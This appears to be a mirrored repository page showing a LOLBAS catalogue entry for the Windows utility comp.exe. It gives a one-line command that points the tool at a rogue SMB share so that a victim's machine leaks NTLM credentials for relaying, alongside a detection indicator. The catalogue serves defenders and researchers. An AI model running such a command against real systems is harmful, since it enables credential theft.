public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-30 23:33:04 +01:00
Code Issues Projects Releases Wiki Activity
0e269e02dc
LOLBAS/yml/OSBinaries/Comp.yml
Kousha Zanjani 0e269e02dc
Update Comp.yml - Removing trailing spaces
2024-02-13 13:45:46 +03:30

26 lines
839 B
YAML
Raw Blame History

---
Name: Comp.exe
Description: Used to compares the contents of two files or sets of files byte-by-byte
Author: 'Kousha Zanjani'
Created: 2024-02-13
Commands:
- Command: comp /M \\10.0.0.10\ fake.txt
Description: Tries to compare a file from rogue SMB Share with a fake.txt file
Usecase: Relay a NTLM authentication
Category: Credentials
Privileges: User
MitreID: T1187
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\comp.exe
- Path: C:\Windows\SysWOW64\comp.exe
Code_Sample:
- Code:
Detection:
- IOC: comp.exe retrieving files from remote server
Resources:
- Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp
Acknowledgement:
- Person: Kousha Zanjani
Handle:
Reference in New Issue View Git Blame Copy Permalink